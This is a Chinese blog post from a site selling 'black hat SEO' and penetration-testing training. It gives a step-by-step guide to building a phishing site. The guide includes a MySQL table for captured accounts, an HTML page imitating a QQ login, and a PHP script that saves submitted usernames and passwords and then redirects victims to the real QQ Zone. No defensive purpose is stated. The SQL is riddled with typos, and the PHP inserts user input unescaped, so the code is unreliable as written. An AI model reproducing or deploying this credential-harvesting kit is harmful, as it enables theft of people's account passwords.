黑帽seo培训_网络信息安全_渗透测试培训_若钒安全网

若钒黑帽seo技术及黑帽seo培训,
一对一教学国内外白帽黑帽seo技术!微信/QQ:3909832

一个简单的钓鱼网站过程-若钒安全网

环境搭建:

PHPstudy:

Navicat Premium

Sublime

1.点击打开PHPstudy,开启Apache和MySQL

Apache是一款web服务器端软件,在本次演示中充当代理服务器与网站进行通信;

MySQL是当下流行的一款关系数据库管理系统,我们用它来创建数据库。

2.创建接收用户的数据库

打开Navicat Premium,点击链接,选择链接MySQL,输入链接名和密码

创建链接之后就可以开始建立数据库了,按快捷键Ctrl+Q打开编辑页面,输入以下语句:

#创建名为php的数据库 drop databse if exists php; creat database php; use php; #创建表 drop table if exists users; id int primary key auto_incream comment ‘编号’, username varche(45) not null comment ‘账号’, pwd varche(80) not null comment ‘密码’, creat_at int not null default 0 comment ‘创建于’, updated_at int not default 0 comment ‘更新于’ )charset=utf8; 1 2 3 4 5 6 7 8 9 10 11 12    

输入完成后点击运行按钮,然后右键点击链接库选择断开链接,之后再重新点击链接数据库,这样我们就建立了一个用来存放信息的表

20200427093903_36621

2.创建钓鱼网页

打开sublime,将PHPstudy安装目录下的WWW目录拖拽到sublime左侧工作区中,右键点击WWW新建test.html文件,接下来就可以来编写我们的网页了

<!DOCTYPE html>  <!--网页类型为文档--> <html>   <!--声明当前页面语言类型为English--> <head>           <!--头部标记,提供文档的描述信息-->  <meta charset="UTF-8"> <!--使用的字符集是UTF-8-->  <title>登录页面</title>   <!--定义页面标题--> <style type="text/css">   div{    width:100px;    height:100px;    margin:100px auto;    }   p{margin: 30px auto}  </style> </head> <body>    <div>     <image src="images/0316.jpg"  width="100" height="100">     </div>       <form  action="./test.php" method="post">   <center>                          <p>账号:<input type="text" name="username" id=""></br></p >   <p>密码:<input type="password" name="pwd" id=""></br></p >         <input type="submit" value="登录"     style="width: 250px;height: 40px;background-color: blue; font-size:18px;color:white;">  </center>  </form> </body> </html> 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30    

保存以上代码后,在浏览器中输入localhost/test.html,此时浏览器以http协议运行网页,上面的代码显示的是一个简单的QQ登录页面

3.通过test.php将用户数据导入到php数据库中

我们可以看到上面代码仅仅实现了向服务器提交表单的功能,而我们最终的目的是将表单上的数据存储到我们的数据库中,因此我们还需要写一个服务器端脚本,命名为test.php

代码如下:

<?php//服务器端脚本 //获取全部提交的数据  $_POST //获取&_POST里面的指定数据 $_POST['表单的name属性值'] //打印数据           print_(待打印的数据)  //print_r($POST) $username = $_POST['username']; $pwd = $_POST['pwd']; $time = time();  //通过PHP的PDO扩展保存数据 //创建PDO对象 $pdo = new PDO('mysql:dbname=php','root','root'); //执行sql语句(将输入的账号密码保存到MySQL仓库中) $rs = $pdo->exec("insert into users values(null,'$username','$pwd',$time,$time)"); $realUrl='https://qzone.qq.com/'; //判断跳转 if($rs){  echo "<script>alert('success');location.href='$realUrl'</script>"; }else{  echo "<script>alert('failure');location.href='$realUrl'</script>";    }?> //提交信息后输出警告框提示信息,并跳转到真实网址 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23    

当用户点击登录按钮后,页面弹出警告框,提示登录成功,并跳转到真实的QQ空间登录页面(因webQQ页面已下线,大家可自行选择realUrl的值)

4.在数据库中查看用户输入的信息

在上述步骤之后,用户提交的数据就已经在我们的数据库里啦,以上就是建立一个简单钓鱼网站的过程。


转载请注明出处:黑帽seo培训_网络信息安全_渗透测试培训_若钒安全网 » 一个简单的钓鱼网站过程-若钒安全网

若钒黑帽渗透技术-提供最专业的渗透测试培训,黑帽SEO培训,欢迎骚扰!!

若钒黑帽SEO培训 渗透测试技术培训
cache
Processed in 0.019579 Second.